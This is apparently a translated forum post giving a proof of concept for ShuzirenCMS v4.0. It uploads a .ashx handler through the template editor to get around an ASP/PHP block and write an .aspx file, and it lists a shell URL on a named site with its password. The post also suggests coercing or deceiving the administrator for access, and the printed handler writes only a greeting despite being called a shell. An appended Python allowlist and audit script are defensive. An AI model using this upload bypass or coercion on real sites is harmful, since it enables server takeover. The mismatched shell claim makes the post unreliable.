Let's take a look... It turns out that across the entire website, ASP and PHP script permissions are blocked in the writable directories ~
Test Environment/system:
ShuzirenCMS v4.0/Windows
Whether through social engineering, digging, injection, sniffing, or intimidating the background administrator into handing over the password...
Log in to the background > Blog > Template Management > Edit
Upload 1.ashx
1.ashx content:
using System;
using System.Web;
using System.IO;

public class Handler : IHttpHandler {
    public void ProcessRequest(HttpContext context) {
        context.Response.ContentType = "text/plain";
        string show = "Hey web master, Have a nice day o.O? I hope so! HaHa";
        // Resolve 4z1.aspx relative to the current request path and create it
        StreamWriter file1 = File.CreateText(context.Server.MapPath("4z1.aspx"));
        file1.Write(show);
        file1.Flush();
        file1.Close();
    }

    // A new handler instance is created for every request
    public bool IsReusable {
        get {
            return false;
        }
    }
}
Path of the one-line shell generated after the handler is accessed:
http://www.bkjia.com/4z1.aspx
Password:
RmB321654897123456789
The other case is if the ASP permission is writable:
upload an ASP shell with the extension aasasa.
Proof of vulnerability:
[Screenshots: Haha1.jpg, Haha2.jpg]
www.2cto.com provides the repair solution:
The digital man (Shuziren) is in our company. We will notify them in time... The webmaster must not disclose the background permissions.
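
The upload described above succeeds because the template editor accepts a .ashx handler while only ASP and PHP are blocked. As an added example (not part of the original post and not ShuzirenCMS code), this Python code shows an extension allowlist for template uploads and an audit of files already on disk; the allowlist contents and the function names are assumptions.

```python
import os

# Assumed allowlist for a blog template editor (not taken from the CMS).
ALLOWED_EXTENSIONS = {".html", ".htm", ".css", ".js", ".png", ".jpg", ".gif"}


def safe_template_name(name):
    """Return the name to store on disk, or None if the upload must be refused."""
    name = name.replace("\\", "/").rsplit("/", 1)[-1]  # drop any client-supplied path
    # ':' selects an NTFS stream, ';' splits names on old IIS, NUL truncates paths.
    if any(ch in name for ch in ":;\x00"):
        return None
    name = name.rstrip(". ").lower()  # Windows silently drops trailing dots and spaces
    stem, ext = os.path.splitext(name)
    if not stem or stem.startswith(".") or ext not in ALLOWED_EXTENSIONS:
        return None
    return name


def audit_template_dir(root):
    """Relative paths of files already on disk that the allowlist would refuse."""
    findings = []
    for folder, _dirs, files in os.walk(root):
        for f in files:
            if safe_template_name(f) is None:
                rel = os.path.relpath(os.path.join(folder, f), root)
                findings.append(rel.replace(os.sep, "/"))
    return sorted(findings)
```

Run `audit_template_dir` against the template directory after any suspected compromise; anything it returns, such as a handler or page file, should not be there.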